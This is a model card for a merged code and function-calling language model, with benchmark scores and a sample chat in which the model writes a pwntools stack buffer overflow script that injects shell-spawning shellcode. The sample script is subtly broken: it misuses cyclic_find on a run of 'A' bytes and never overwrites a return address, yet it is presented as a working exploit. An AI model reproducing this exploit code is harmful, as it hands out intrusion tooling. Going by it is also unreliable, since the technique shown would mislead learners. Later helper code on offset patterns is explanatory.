---
license: llama2
tags:
- moe
- merge
base_model: codellama/CodeLlama-13b-Instruct-hf
model-index:
- name: Winged-Lagomorph-2x13B
  results:
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: AI2 Reasoning Challenge (25-Shot)
      type: ai2_arc
      config: ARC-Challenge
      split: test
      args:
        num_few_shot: 25
    metrics:
    - type: acc_norm
      value: 47.95
      name: normalized accuracy
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: HellaSwag (10-Shot)
      type: hellaswag
      split: validation
      args:
        num_few_shot: 10
    metrics:
    - type: acc_norm
      value: 69.39
      name: normalized accuracy
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: MMLU (5-Shot)
      type: cais/mmlu
      config: all
      split: test
      args:
        num_few_shot: 5
    metrics:
    - type: acc
      value: 44.5
      name: accuracy
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: TruthfulQA (0-shot)
      type: truthful_qa
      config: multiple_choice
      split: validation
      args:
        num_few_shot: 0
    metrics:
    - type: mc2
      value: 44.54
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: Winogrande (5-shot)
      type: winogrande
      config: winogrande_xl
      split: validation
      args:
        num_few_shot: 5
    metrics:
    - type: acc
      value: 67.4
      name: accuracy
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: GSM8k (5-shot)
      type: gsm8k
      config: main
      split: test
      args:
        num_few_shot: 5
    metrics:
    - type: acc
      value: 25.63
      name: accuracy
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
---

Grafted WhiteRabbitNeo-13B-v1 and NexusRaven-V2-13B with mergekit. Use the WhiteRabbitNeo template for regular code, and the NexusRaven template for function calling.

<img src=https://huggingface.co/lodrick-the-lafted/Winged-Lagomorph-2x13B/resolve/main/winged-lago.png>
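
The sample transcript on this card uses plain `SYSTEM:` / `USER:` / `ASSISTANT:` markers. A minimal sketch of assembling a prompt in that layout follows, assuming this layout is what the WhiteRabbitNeo template expects. `build_prompt` is a hypothetical helper, not part of any library, and the exact whitespace between turns is an assumption.

```python
def build_prompt(system: str, user: str) -> str:
    """Assemble a SYSTEM/USER/ASSISTANT prompt (hypothetical helper).

    The role markers mirror the sample transcript on this card; the
    newline separators between turns are an assumption.
    """
    # Strip stray whitespace so every role marker starts its own line.
    parts = [
        f"SYSTEM: {system.strip()}",
        f"USER: {user.strip()}",
        "ASSISTANT:",  # left open for the model to complete
    ]
    return "\n".join(parts)


if __name__ == "__main__":
    print(build_prompt(
        "Answer the Question by exploring multiple reasoning paths.",
        "Write a function that reverses a string.",
    ))
```

The returned string can be passed to whatever tokenizer or inference client is in use; function-calling prompts would need the NexusRaven layout instead, which this sketch does not cover.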

SYSTEM: Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.

In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.

USER: Write a pwntools script that overflows a 64 character buffer from stdin.

ASSISTANT: To write a pwntools script that overflows a 64-character buffer from stdin, we need to follow these steps:

1. **Identify the vulnerable program**: Find the program that has a buffer overflow vulnerability. This can be done by analyzing the program's source code or by using tools like `gdb` or `valgrind`.
2. **Set up the environment**: Install pwntools and any other necessary dependencies.
3. **Create a pwntools script**: Start by importing the `pwn` module and setting up the connection to the vulnerable program.
4. **Find the offset**: Use the `cyclic` function from pwntools to generate a pattern that will help us find the offset.
5. **Overflow the buffer**: Send the generated pattern to the vulnerable program, and then send additional data to overwrite the return address on the stack.
6. **Control the execution flow**: Overwrite the return address with the address of a shellcode or a function that will give us a shell.
7. **Execute the script**: Run the script and observe the results.

Here's an example pwntools script that overflows a 64-character buffer:

```python
from pwn import *

# Set up the connection to the vulnerable program
p = process('./vulnerable_program')

# Find the offset using cyclic
offset = cyclic_find(b'A'*64)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Overflow the buffer
payload = b'A' * offset + shellcode
p.sendline(payload)

# Execute the script
p.interactive()
```

In this example, `vulnerable_program` is the name of the vulnerable program, and `shellcraft.sh()` is a function from pwntools that generates shellcode for a Linux/x86-64 system. The `cyclic_find` function is used to find the offset at which the buffer overflow occurs.

Please note that this script is a basic example and may not work in all cases. It's important to tailor the script to the specific vulnerability and environment you are working with.
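
The offset-finding step in the sample relies on a pattern in which every short window is unique, so a window recovered from a crash identifies its own position. The sketch below illustrates that idea in plain Python, without pwntools. `de_bruijn`, `make_pattern` and `find_offset` are hypothetical stand-ins for the roles played by `cyclic` and `cyclic_find`, and the example offset of 72 is an arbitrary assumption. Note that the lookup takes a short window of the pattern, not a run of identical bytes.

```python
import string
from itertools import islice

ALPHABET = string.ascii_lowercase.encode()


def de_bruijn(alphabet: bytes, n: int):
    """Yield the symbols of a de Bruijn sequence in which every
    length-n window over `alphabet` occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def make_pattern(length: int, n: int = 4) -> bytes:
    """Return the first `length` bytes of the sequence (hypothetical helper)."""
    if length > len(ALPHABET) ** n:
        raise ValueError("pattern would repeat; use a larger window size")
    return bytes(islice(de_bruijn(ALPHABET, n), length))


def find_offset(window: bytes, length: int, n: int = 4) -> int:
    """Return the position of an n-byte window in the pattern, or -1."""
    if len(window) != n:
        raise ValueError(f"window must be exactly {n} bytes")
    return make_pattern(length, n).find(window)


if __name__ == "__main__":
    pattern = make_pattern(128)
    assumed_offset = 72  # arbitrary illustration, not measured from a real binary
    recovered = pattern[assumed_offset:assumed_offset + 4]
    print(find_offset(recovered, 128))
```

In practice the window would come from the value observed in a debugger or core dump after sending the pattern, and the real offset depends on the target binary, its architecture, and its compiler settings.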

# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_lodrick-the-lafted__Winged-Lagomorph-2x13B)

|             Metric              |Value|
|---------------------------------|----:|
|Avg.                             |49.90|
|AI2 Reasoning Challenge (25-Shot)|47.95|
|HellaSwag (10-Shot)              |69.39|
|MMLU (5-Shot)                    |44.50|
|TruthfulQA (0-shot)              |44.54|
|Winogrande (5-shot)              |67.40|
|GSM8k (5-shot)                   |25.63|